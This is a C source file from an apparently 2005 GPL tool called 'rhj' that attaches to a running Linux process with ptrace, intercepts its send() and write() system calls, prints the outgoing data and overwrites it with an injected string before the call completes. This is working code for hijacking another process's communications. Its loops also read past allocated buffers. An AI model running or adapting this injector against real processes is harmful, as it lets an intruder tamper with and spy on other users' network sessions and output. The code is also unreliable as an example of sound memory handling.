/***************************************************************************
 *   Copyright (C) 2005 by Angelo Rosiello                                 *
 *   angelo@rosiello.org                                                   *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 ***************************************************************************/


#include "injecting.h"

//OVERVIEW: injecting the message into the right syscall.
//REQUIRES: string!=NULL && pid!=NULL

int stack_insertion( char *string, unsigned long int address, unsigned long int length, unsigned long int pid );

int inject( char *syscall, unsigned long int descriptor, char *s, unsigned long int pid )
{

        unsigned long int value;
 	unsigned long int arg1=0;
	unsigned long int arg2=0;
	char *buffer;
	char *string;
        int i;
	int finished=0;
	
        ecx=uregs.ecx;

	string=(char *)malloc( (strlen(s)+4)*sizeof(char) );
        if( string==NULL )
	{
		printf( "(rhj) Fatal Error: Could not allocate memory\n" );
		return( -1 );
	}
	clean( string );

	sprintf( string, "%s\n", s );

	// If it's a SYS_send( )
	if( !strcmp(syscall, "send") )
	{
		i=0;
		//Reading the Stack...
		while( !finished )
                {
                        value=ptrace( PTRACE_PEEKTEXT,pid,ecx+i,0L );
			if( i==0 && value!=descriptor )
			{
				return ( -3 );
			}
			else if( i==4 )
				arg1=value;
			else if( i==8 )
			{
				arg2=value;
				if( arg2 < (strlen(string)) && arg2!=0 )
				{
					if( singlestep( pid ) == -1 ) return ( -1 );
					return ( -3 );
				}
			}
			i+=4;
			//If the stack contains a 0x0 the string is finished
			if( value==0L )
			{
				finished=1;
			}

                }
                buffer=(char *)malloc( (arg2+32)*sizeof(char) );
	        if( buffer==NULL )
		{
			printf( "(rhj) Fatal Error: Could not allocate memory\n" );
			return( -1 );
		}
		clean( buffer );

                for( i=0; i<arg2; i+=4 )
                {
                        value=ptrace( PTRACE_PEEKTEXT,pid,arg1+i,0L );
                        memcpy( buffer + i, &value, 4 );
                }

		i=0;
		while( i<strlen(buffer) )
		{
			if( buffer[i]=='\r' )
			{
				buffer[i]='\\';
				buffer[i+2]=buffer[i+1];
				buffer[i+1]='r';
				i++;
			}
			if( buffer[i]=='\n' )
			{
				buffer[i]='\\';
				buffer[i+2]=buffer[i+1];
				buffer[i+1]='n';
				i++;
			}
			i++;
		}

		printf( "(rhj) ------------------------\n" );
                printf( "(rhj) Buffer: %s\n", buffer );
		free( buffer );
                if( stack_insertion( string, arg1, arg2, pid ) )
                        return ( -1 );


	}
	// If it's a SYS_write( )
	if( !strcmp(syscall, "write") )
	{

        	/* Read the stack */
		printf( "(rhj) ------------------------\n" );
        	printf( "(rhj) Descriptor: %d\n", ebx );
        	printf( "(rhj) Length of the string: %d\n", edx );

                buffer=(char *)malloc( (edx+32)*sizeof(char) );
	        if( buffer==NULL )
		{
			printf( "(rhj) Fatal Error: Could not allocate memory\n" );
			return( -1 );
		}
		clean( buffer );

        	/* Read argument of write */
        	for( i=0; i<edx; i+=4 )
        	{
                	value=ptrace( PTRACE_PEEKTEXT,pid,ecx+i,0L );
                	memcpy( buffer + i, &value, 4 );
        	}

		for( i=0; i<2048; i++ ) if( buffer[i]=='\n' ) buffer[i+1]='\0';
        	printf( "(rhj) Buffer: %s\n", buffer );
		free( buffer );

		if( stack_insertion( string, ecx, edx, pid ) )
			return ( -1 );
        }

	return ( 0 );
}

int stack_insertion( char *string, unsigned long int address, unsigned long int length, unsigned long int pid )
{
	unsigned long int i=0L;
	char *temp=string;

        printf( "(rhj) Injecting: %s", string );

        //Cleaning the stack
        while( i<length )
        {
        	ptrace( PTRACE_POKETEXT,pid,address+i,0L );
                i+=4;
        }

        i=0L;
        while( *string )
        {
                ptrace( PTRACE_POKETEXT,pid,address+i,*(unsigned long *)string );
                string+=4;
                i+=4;
        }

        //Setting registers
        if( ptrace(PTRACE_SETREGS,pid,&uregs,&uregs) )
        {
                ptrace( PTRACE_DETACH,pid,0L,0L );
                perror( "(rhj) setregs\n" );
                return ( -1 );
        }

        //Stop the trace and run the command
        ptrace( PTRACE_DETACH,pid,1L,0L );
	free( temp );
        return ( 0 );

}

